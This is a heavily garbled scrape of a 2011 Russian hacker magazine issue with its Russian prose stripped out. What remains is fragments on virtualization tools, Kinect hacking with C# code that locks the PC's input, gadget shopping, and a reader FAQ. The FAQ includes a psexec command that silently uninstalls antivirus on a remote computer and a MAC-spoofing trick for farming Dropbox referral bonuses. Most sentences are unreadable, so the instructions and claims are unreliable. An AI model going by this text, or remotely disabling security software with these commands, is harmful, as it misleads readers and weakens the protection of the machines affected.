virt-manager (virt-manager.org)
, ,
virt-install, virt-clone virt-viewer.
, Red Hat,
libvirt. , - ,
.
virt-manager
( ) , , (,
QEMU)
.

, , , , ,

128

( ).
, virt-install.
,
, ,
(, ACPI NetBSD)
.
.
, , .
.

,
, (
, , , ),
, , /
.

( ,
)
.

. libvirt.org/apps.html ,
libvirt . , :
virt-top (people.redhat.com/~rjones/virt-top) TOP-
.
top.
virt-df (people.redhat.com/~rjones/virt-df) df,

.
X 07 /150/ 2011

vnc-viewer
virt-p2v (people.redhat.com/~rjones/virt-p2v)
.
virt-v2v (git.fedorahosted.org/git/?p=virt-v2v.git;a=summary)
,
, qemu-kvm.

Web-

Web- Karesansui,
2.0.
Web2.0- ,
virt-manager.
, , Web-
.
Karesansui Python-
SQLite Java- tightVNC-java,
, VNC libvirtd. web-
jQuery.
,
Archipel (archipelproject.org), Jabber-,
,
IM-, , ,
.
,
- .
jabber-.
, ,
X 07 /150/ 2011

, ,
Jabber- 2000

, .
, XMPP, Archipel
Web-,
, .
Karesansui.
:
;
Archipel;

;
;
,
XMPP S2S.
libvirt. , , Amazon EC2
Eucalyptus (open.eucalyptus.com) OpenStack (openstack.org),

OpenNode (opennode.activesys.org)
Adobe Flex Sun/Oracle Java AbiCloud (community.abiquo.
com).

Linux ,
.
QEMU KVM, ,
. z

129

PHREAKING
(po@kumekay.com)

RGB-

KINECT:


Kinect Xbox 360


. 2010 ,
:
2 10 . ,
PC, !
Kinect , . ,
xbox-zone.ru, ,
ifixit.com
, . , Kinecta :
1. RGB-,
-: 640x480 30
.
2. , .

130

3. , , .
4.
.
5. , .
6. PrimeSensor ,
-, 3D-.

Kinect, ,
, .
X 07 /150/ 2011

Faast
xbox,
, USB ,
12 (
).
Microsoft $34,99, ,
(s.dealextreme.com/search/kinect+power+supply)
.
.

, Adafruit $3000 ,
. ,
,
github.com/OpenKinect/libfreenect.
,
OpenGL .
, apache 2.0,
,
(java, matlab, python, ruby).
. Kinect Microsoft,
PrimeSence. Kinect , NUI (natural user interface) ,
X 07 /150/ 2011

,
, .
open source-.
.
,
!
, , Faast (goo.gl/
tu8Gs). PrimeSensor : Kinect Camera,
Kinect Motor Kinect Audio.
, OpenNI
PrimeSense NITE.
OpenNI ,

(Natural Interactions). OpenNI , ,
,
. , , :
goo.gl/xRuuU.
NITE , OpenNI. ,
, PrimeSence,
, .

131

PHREAKING

Ultraseven
0KOIk2JeIBYClPWVnMoRKn5cdY4=. .
NITE : goo.gl/6uhJJ.
xml-.
: goo.gl/5e1nz.
, , .
SampleConfig.xml KinectXMLs\OpenNI Data
OpenNI ( , C:\
Program Files\), KinectXMLs\NITE C:\
Program Files\Prime Sense\NITE\Data.

, !

, .
, . Faast (Flexible Action and Articulated Skeleton Toolkit)
,
,
.
,
PC. projects.ict.usc.edu/mxr/faast/.
. , .
, World of Warcraft:
#
# :
# __ __
left_arm_out 10 key a
left_arm_across 10 key d
lean_forwards 15 key w
lean_backwards 10 key s
left_arm_forwards 20 key tab
right_arm_forwards 20 key 1
right_arm_up 12 key 4
right_arm_across 15 key 2
right_arm_out 15 key 3

, , , .
, ,
, .
.
.

132

Kinemote
.
- XBMC . , . kinemote.net.
,
, , ,
, .

Ultraseven
, ,
Ultraseven.
.
, . , ,
,
. ,
. ,
,
. : code.google.
com/p/kinect-ultra/.

! , ,
-,
: , .
OpenNI ( C++, C#) Microsoft Visual Studio 2010,
.
, ,
.
Nui.Vision.dll goo.gl/XNjq4.
.
Visual Studio WPF Application
OpenNi.net.dll (
, OpenNI) Nui.Vision.dll ( ).
.
X 07 /150/ 2011


MainWindow.xaml 662x520 , , ,
:
<Image Name="imgCamera" />
<Canvas Name="LayoutRoot" />

MainWindow.xaml.cs :
using System.ComponentModel; //
using Nui.Vision;
//

NuiUserTracker
. ,
SamplesConfig.xml OpenNI Debug
Release .
:
NuiUserTracker _skeleton; //
BackgroundWorker _worker = new BackgroundWorker();
//
double topY = 0;
//
double bottomY = 0;
//
int numOfBobs = 0;
//
bool bottomPosition, topPosition;
// ,
X 07 /150/ 2011

Ellipse ellipse = new Ellipse //


{ Fill = new SolidColorBrush(Colors.AliceBlue),
Width = 20, Height = 20 };

:
//
_skeleton = new NuiUserTracker("SamplesConfig.xml");
// ,
//
_skeleton.UsersUpdated += new NuiUserTracker.
UserListUpdatedHandler(Skeleton_UsersUpdated);

NuiUserListEventArgs.Users
.
.
,
. .
, . : ,
.
( - ).
, , .
//
// ( )

133

PHREAKING

foreach (var user in e.Users) {


//
if ((topY == 0) && (user.Neck.Y !=0) ) {
//
topY = user.Neck.Y+20;
Line topLine = new Line { //
Y1 = topY,X1 = 0, Y2 = topY, X2 = 662,
Stroke = new SolidColorBrush(Colors.Red),
StrokeThickness = 4 };
//
LayoutRoot.Children.Add(topLine);
//
bottomY = user.Torso.Y + 20;
Line bottomLine = new Line { //
Y1 = bottomY, X1 = 0, Y2 = bottomY, X2 = 662,
Stroke = new SolidColorBrush(Colors.Blue),
StrokeThickness = 4 };
//
LayoutRoot.Children.Add(bottomLine);
//
LayoutRoot.Children.Add(ellipse); }

, :
ellipse.Margin= new Thickness(user.Neck.X, user.Neck.Y,
0, 0); //
//
if (user.Neck.Y+5 < topY) topPosition = true;
//
if (user.Neck.Y + 25 > bottomY) bottomPosition = true;
if (topPosition && bottomPosition) { //
numOfBobs++;
//
topPosition = false;
//
bottomPosition = false;
}
// ,
//
if (numOfBobs >= 20) {
Application.Current.Shutdown(); //
}


. App.xaml.cs :
// ,
//
using System.Runtime.InteropServices;

.
Windows API BlockInput:
public partial class NativeMethods {
[System.Runtime.InteropServices.DllImportAttribute(
"user32.dll", EntryPoint = "BlockInput")]
[return: System.Runtime.InteropServices.MarshalAsAttribute(
System.Runtime.InteropServices.UnmanagedType.Bool)]
public static extern bool BlockInput(
[System.Runtime.InteropServices.MarshalAsAttribute(
System.Runtime.InteropServices.UnmanagedType.Bool)]
bool fBlockIt);
}

App.
xaml .

134

:
using System.Timers;

:
private static System.Timers.Timer TheTimer;

, , :
private void button1_Click(object sender, RoutedEventArgs e)
{
//
TheTimer = new System.Timers.Timer(3600000);
//
TheTimer.Elapsed += new ElapsedEventHandler(BlockPC);
TheTimer.Enabled = true;
}

:
void BlockPC(object source, ElapsedEventArgs e) {
App.NativeMethods.BlockInput(true); //
//
MainWindow w = new MainWindow();
w.Show(); }//


:
//
App.NativeMethods.BlockInput(false);

- , ,
, .

, !
, ,
, .
, 3 4 ,
. 3d-, !

Kinect , ,
.
,
. : iRobot Create ,
Ubuntu ROS
, Kinect .
Willow Garage Turtlebot (willowgarage.com/turtlebot).
Bilibot (bilibot.com),
.
$1200.
. ,
PC, Asus WAVI Xtion. ,
, , ,
, ,
, . z
X 07 /150/ 2011

PHREAKING
(po@kumekay.com)

-
, . ,

.
.
,
, .

.
. ,
!

- .
made in China. eBay ,
. , , ,

136

. !
dealextreme.com, 50 000 . focalprice.com
kaidomain.com. buyincoins.com,
, .
, .
-, - (dealextreme.com/gift-ideas) .
paypal,
( Maestro Visa-Electron).
paypal.com ,
, .

ebay-forum.ru. .
X 07 /150/ 2011

,
. ,
!
DealExtreme , 12
. ,
, .
: dealextreme.com/details.dx/sku.35199 $19. stere amp,
, .

, , ,
.
, . mp3-,
usb- sdhc, ,
, , , .
! , .
mp3- .
, ,
, , .
, USB SD . ,
:
1. ;
2. ;
3. USB/SD;
4. ( );
5. /;
6. ( ).
. ,

.
,
: dealextreme.com/details.
dx/sku.27987.
, , !
10 13 , 500-700 ,
.
X 07 /150/ 2011

, -
! -, ,
.
, .
( ),
.
12
s.dealextreme.com/search/EL+Strip. ,

( ),
. ,
,
, -
.
BMW- (dealextreme.com/p/25513).
, ,
-:
(dealextreme.com/p/43968), - , (dealextreme.com/p/44281),
12- , , .

, , . , .
, .
, ePad buyincoins.com/details/epad-7-touch-mid-notebookandroid-usb-enthernet-rj45-product-1851.html. ,
ARM- VIA VT8505
450 MHz ,
, . 7
( 800x480)
-
-.
, .
, 7" Dropad (dealextreme.com/p/71932)
Cortex A8
DJ- (market.android.com/details?id=com.beatronik.
djstudio), GPS
.

137

PHREAKING

. , , ,
. EDGE
3G- .
, ,
, . Wi-Fi. USB 3G-
Wi-Fi . USB 3G- ,
,
( Huawei ZTE)
700-1000 . Wi-Fi ( USB-),
dd-wrt (dd-wrt.com)
3G- , , dealextreme.com/p/59040.
dealextreme.
com/p/51797, ,
20 ,
. android Dropad,
USB- . android- 2.2, 3G Wi-Fi, , Barnalce
WiFi Tether (market.android.com/details?id=net.szym.barnacle).

,
- . mp3-, fm-, (dealextreme.com/p/625),
. ,
Bluetooth- (dealextreme.com/p/14956),
.

, .
,
,
. -

138

FM-
USB-

200
60
600
150
1000
60
500
90
70
150
90
530
200

300
4000

,
. -
. ,
35 /, . ,
,
7-12 / ,
. ,
, (dealextreme.com/p/ 71635)
. ,
, 3-4 .
:
(dealextreme.com/p/ 35190),
X 07 /150/ 2011


: NiCd, NiMH, LiIon, LiPo, LiFe , ,
-. ,
5 , ,
, ,
- .
12- . , . 12
2,1
5,5 , ,
. -
. .
,
:
5 : USB-,
, . , (dealextreme.com/p/58012)!
(dealextreme.com/p/34674).
microUSB, miniUSB, nokia, iPhone, SE, LG ..
1,5-12 : , 220
, , 6-9 .
, Wi-Fi ,
. (dealextreme.
com/p/90021) .
12-24 : 19-20 , (dealextreme.
com/p/3438).
.
220 : - ,
220 . , ,
,
100 . focalprice.com/
ERK80S/100W_DC_12V_to_AC_220V_Power_Inverter_Kit_Silver.html.


. , .

,
.
:
1. , ,
.
2.
.
3. .
X 07 /150/ 2011

mp3

C
4. .
5. .
,
,
. ,
.
- ,
,
. ( ).

,
(
), .
,
.

,
( 50 ). ,
.
,
. ,
, . ,
,
, ,
! z

139

UNITS
Step (twitter.com/stepah)

faq
united?

faq@real.xakep.ru

Q: , ,
?
A: , -
, Google
Analytics (www.google.com/analytics).
(
) .
,
. ,
, .

GA ( JS-,
-

Google),
_trackPageLoadTime(), _trackPageview():
// GA:
_gaq.push(['_trackPageview']);
_gaq.push(['_trackPageLoadTime']);
// GA:
pageTracker._trackPageview();
pageTracker._trackPageLoadTime();


.
,
.

140

Q: Windows
?
?
A: ,
,
Backup
Utility (code.google.com/p/backup-utility-4)
DataGrab (sites.google.com/a/obxcompguy.
com/foolish-it/vb6-projects/datagrab), .

(
),

. , ,
,
exe-.

Q: SOCKS5-,
Linux.
A: , , , Linux-
:
ssh -N -D 0.0.0.0:1080 localhost

,
( -D) 1080 SOCKS4 SOCKS5 ( ,
SOCKS5-).
-N , idle- -
localhost.
ssh ,
-f. , .
,
iptables:

Q:
iptables -A INPUT --src 1.2.3.4 -p tcp
- . ,
--dport 1080 -j ACCEPT
, , iptables -A INPUT -p tcp --dport 1080 -j

REJECT
.
?
A: . IP- 1.2.3.4
Apple,
(WTF?!).
www.myfax.com/free.
, .

( 1080 ).
,
, ,

proxy-, Perl, TCP
X 07 /150/ 2011

SQLiteSpy
SQLite


proxy (github.com/pkrumins/perl-tcp-proxy).
IP-
( @allowed_ips). TCP proxy
SOCKS- , . SSH
-:
ssh -N -D 55555 localhost

SOCKS , ,
localhost.

Q: , (
) , Windows?
A:
Windows,
(SRP).
,
(GPO).
,
( ) ,

. ,
,

:
C:\Windows\explorer.exe
C:\Windows\System32\csrss.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\rdclip.exe
C:\Windows\System32\taskhost.exe
C:\Windows\System32\TSTheme.exe
C:\Windows\System32\userinit.exe


. :
X 07 /150/ 2011

1. (
mmc).
2.
.
3.
(GPO).
4. .
5. , ,
GPO.
6. .

< .
7. Windows



.
8. .
.
9.

.
,
.
10.
. ,
(,
%HKEY_LOCAL_MACHINE\...).
11. ,
,
,
.


, .

Q:
?
A: - ,
SQLite (www.sqlite.org),

.
SQLite
(
Mac OS iPhone OS, Android).
SQLite
sqlite3


PMD
GUI- SQLite Browser
(sqlitebrowser.sourceforge.net), SQLiteSpy
(www.yunqa.de/delphi/doku.php/products/
sqlitespy/index) SQLite Manager (addons.
mozilla.org/ru/firefox/addon/sqlite-manager).
, SQLite,

(bit.ly/mCQlxA).

Q: ?
A: ,
:
$ python -m SimpleHTTPServer

8000 (
) -
(.. , ).
(
0.0.0.0). index.htm,

. ,
.
.
, Python
SimpleHTTPServer.
Python Linux-,
.

, .

Q:
?
A: ,
, .
,

Symantec Antivirus.

,

( , ).
(
),
,
.

141

UNITS

. 300
?
, ,
.
HKEY_LOCAL_MACHINE\
SOFTWARE\MICROSOFT\WINDOWS\CURRENT
VERSION\UNINSTALL ,
Symantec Antivirus.
{BA4B71D1-898E4306-AE87-8BA7A596F0ED}.
UninstallString ,

MsiExec.exe.

,
.
- . ,
MsiExec.exe,
:
MsiExec.exe /norestart /q/x{BA4B71D1898E-4306-AE87-8BA7A596F0ED}
REMOVE=ALL

,

:
psexec \\computer_name MsiExec.exe /
norestart /q/x{BA4B71D1-898E-4306AE87-8BA7A596F0ED} REMOVE=ALL

,
,
, .

Q:
Dropbox,
? email
: -

.
A: , .
Dropbox-,
: .


. , Dropbox
MAC-.
, 250 Dropbox,
:
1. email.
2. , .
Linux Mac-
ifconfig,
Technitium MAC Address Changer v5 Release 3
(www.technitium.com). ,
, -

142

Dropbox
(habrahabr.ru/blogs/services/120526).


?
A: , , ,

Q: , ?
JavaScript ,
HTML- ( )
DOM.
?
A: :

PowerShell (
Windows 7 Windows Server 2008 R2).
:
1. System.IO.FileSystemWatcher
:


? , ,

(sreznikov.blogspot.com). , ,
. ,
String supplant,
,
{}. ,
,
,
.

$watcher = New-Object System.


IO.FileSystemWatcher
$watcher.Path = $searchPath
$watcher.IncludeSubdirectories = $true
$watcher.EnableRaisingEvents = $true

String.prototype.supplant =
function(o) {
return this.replace(/{([^{}]*)}/g,
function(a, b) {
var r = o[b];
return typeof r === 'string' ||
typeof r === 'number' ? r : a;
}
);
};

. :
var data = {
url: '/test/',
thumb_src: 'test.gif',
thumb_width: 60,
thumb_height: 30,
caption: '-!'
};

supplant,
:
var template = '<div class="preview">
<p class="image"><a href="{url}"><img
src="{thumb_src}" width="{thumb_
width}" height="{thumb_height}"/></
a></p><p class="caption">{caption}</
p></div>';
var result = template.supplant(data);

, ,
(createElement)
(appendChild) DOM.

Q: , API,

.Path , .
.IncludeSubdirectories
.
2. ,
, $watcher
.
:
$changed = Register-ObjectEvent
$watcher "Changed" -Action {
write-host "Changed: $($eventArgs.
FullPath)"}


, .
, .
3. , Powershell, :
Unregister-Event $changed.Id

,
PowerShell,
. PowerGUI (www.
powergui.org) ,
.

Q: ?
: PE-,
?
,
:).
A: .
Process Memory Dumper (evilfingers.com/
tools//ProcessMemoryDumper.php),

PMD. GUI-,

DumpedProcess.dmp,

. z
X 07 /150/ 2011

>Net
ApacheConf Lite 7.1
DragonDisk for Windows 0.8.1
DU Meter 5
Firewall Builder 4.2.2
Gladinet Cloud Desktop Starter
Edition 3.2
Host Profiles 1.0
Htpasswd Generator 4.1.1
inSSIDer 2.0.7

>Multimedia
FinePrint 6.20
ImgBurn 2.5.5.0
IsoBuster 2.8.5
Kindle for PC 1.5.0
Nemo Documents
Oxelon Media Converter 1.1
pdfFactory 4.10
SumatraPDF 1.6
VidCoder 0.9.2
Virtual CloneDrive 5.4.5.0
VirtualDub 1.9.11

>Misc
allsnap v1.50beta
AtomicDic 0.2.1
AutoHotkey_L
Bins
Chameleon Window Manager
1.1.0.126
ClipX 1.0.3.9 beta 7 x86
DropIt 2.6
Free Opener 1.0
Handy Shortcuts
Hot Corners 2.2.2.0
JumpPad 2.1
Launch 2.6 Beta2
MouseExtender 1.9.9.3
NTFS Permissions Tools 0.9.9
QTTabBar 1.2.2.1
SmartGUI Creator 4.0
Switcher 2.0.0
Synergy 1.4.2 beta
Taskbar Shuffle 2.5
TrayScript 1.0
TreeSize Free V2.51

>MAC
Book Hunter 1.1.10
Breakaway 2.0
CocoaPacketAnalyzer 0.72
DVD Hunter 1.1.10
Mactracker 6.0.2
Meteorologist 1.5.5
Neuronyx 2.4.5
Nocturne 2.0
Quicksilver 60
Roccat Browser 1.5
ShellBar 1.0
SoundCloud 1.1.0
Spotify 0.5.1.98
SunFlower 0.13
TeamViewer 6.0
Visor 1.9
VLC 1.1.10
VUWER 1.4.6
WireShark 1.6.0

>System
Dependency Walker 2.2
EASIS Drive Check
KeePass 2.15
Listary
Locate32 3.0.7
Master Commander 1.0.1
McAfee ShareScan
Menu Uninstaller 1.2.1
MiniTool Power Data Recovery Free
Edition 6.5
NexusFile 5.3.1
RegASSASSIN
SandboxDiff 2.3
Service monitor
StressMyPC 1.01
SuperF4 1.2
TrayStatus 1.2.3
TrueCrypt 7.0a
USB Disks Access Manager 1.0

>Security
BurpSuite 1.4
DirectoryScanner 1.0
DOMinator
EchoMirage 1-2
Enhanced Mitigation Experience
Toolkit v2.1
Microsoft Web Application
Configuration Analyzer v2.0
nuf-fuzzer
PANBuster v1.0
peepdf 0.1
rkanalyzer
SiteDigger v3.0
w3af 1.0
yara-project 1.5
YETI

Odysseus-2-0-0-84
Pidgin OTR 3.2.0
Psi 0.14
RoboForm Everywhere v7.3.2
WinSCP 4.3.3

>Net
Firefox 4.0.1
Google Chrome 12
gWakeOnLan 0.5.1
IGMPproxy 0.1
ipvs 1.2.1
KVIrc 4.0.2

>System
Bacula 5.0.3
Glibc 2.14
GNU Parted 3.0
Grub 1.99
HDFS 0.21.0
Heartbeat 2.1.4
Libertine 5.0
Linux Kernel 2.6.39.1
Redis 2.2.8
Sentinella 0.9.0
Slony-1 2.0.6
Syslog-ng 3.2.4

>Games
Warzone 2100 2.3.8

>Devel
Flot 0.7
GiNaC 1.6.0
Google Web Toolkit 2.3
Memcached 1.4.5
Nemerle 1.0
Nodejs 0.4.8
Netty 3.2.4
NumPy 1.6.0
Perl 5.14
phpMyAdmin 3.4.0
Prettify
Qwt 6.0.0
Scala 2.9.0.1
Scala IDE
Tcc 0.9.25
Thrift 0.6.1
Twisted 11.0.0
XCache 1.3.2

>>UNIX
>Desktop
AbiWord 2.8.6
Floola 2011r3
Fontmatrix 0.6.0
FreeArc 0.666
Frinika 0.5.1
gLabels 3.0.0
Gramps 3.2.6
keyTouch 2.4.1
Launchy 2.5
LuxRender 0.8
Metromap 0.1.3
PiTiVi 0.14
QSapecNG 1.2.2
Remuco 0.9.5
Sage 4.7
SimpleBurn 1.6.2.1
soundKonverter 1.0.0
Workrave 1.9.4

>>
""

>X-Distr
BackTrack 5

>Server
Apache 2.2.19
Berkeley DB 5.1.25
BIND 9.8.0
CUPS 1.4.6
DHCP 4.2.1
FlockDB 1.8.0
JBossAS 6.0.0
Lucene 3.2
OpenLDAP 2.4.25
OpenSSH 5.8
OpenVPN 2.2.0
Postfix 2.8.3
PostgreSQL 9.0.4
Samba 3.5.8
Sendmail 8.14.5
Squid 3.1.12
Tomcat 7.0.4

>Security
Burp Suite 1.4
EAPeak 0.1.0
Fimap 0.9
Ghost-Phisher 1.1
Iptables 1.4.11.1
Metasploit Framework 3.7.1
Ncrack 0.04a
Portsentry 1.2
Pytbull 1.1
Radare2 0.7
RIPS 0.40
SIPVicious 0.2.6
Skipfish 1.91
Sniffjoke 0.4.1
w3af 1.0
Wireshark 1.6.0
Xplico 0.6.3
Zed Attack Proxy 1.3.0

Opera 11.11
PgBouncer 1.4.1
qBittorrent 2.8
SeaMonkey 2.0.14
SIM 0.9.4.3
SPGT 0.1
Subsonic 4.4
Tcpdump 4.1.1
Thunderbird 3.1
Transmission 2.31
Udpxy 1.0
XChat 2.8.9

[1-150]. C 1999
150

07(150) 2011

>>WINDOWS
>Development
API Monitor v2 (Alpha-r7)
AsmJit 0.8.6
AsmJit 1.0beta2
Beyond Compare 3
Easy Query Builder
Git 1.7.4
intype 0.3.1
Mercurial 1.8.4
SQLite Manager 0.7.4
SQLite Precompiled Binaries For
Windows
SQLiteSpy 1.9.0
SQLyog Community Edition - 9.10
Titanium Studio Release Candidate 1
XML Notepad 2007
x 07 (150) 2011

07 (150) 2011

c 1999

[1-150]



: 2
10
.

UNITS

HTTP://WWW2

MINUS
min.us

PAGE2RSS
page2rss.com

-,

. Dropbox Public
. min.us ,
. ( Windows, Mac, Linux)

dragndrop, ,
. (Android, iOS, WP7),
.

RSS-,
, ,
- RSS-.
, ? Google Reader
( RSS- Google) ,
RSS-. ,
RSS-, .

page2rss. ,
.

VISUALLAND
visualland.net

PILOTHANDWITING
pilothandwriting.com

ARP, DNS, DHCP, ICMP


.. , ,
, ,
RFC . visualland.

. . , : ,
, ,
. : bit.ly/Jasper_here.

,
. A4,
.
-
. ,
PilotHandwiting .
, ,
.

144

X 07 /150/ 2011

>> coding








e1$m 







CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

X 10 /141/ 10